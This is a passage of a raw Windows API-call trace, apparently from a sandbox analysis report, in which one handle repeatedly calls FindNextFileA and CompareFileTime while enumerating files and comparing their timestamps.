(lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.582] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.582] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.583] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.583] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.584] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.584] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned 1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.585] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.585] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.586] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.586] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.587] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.587] 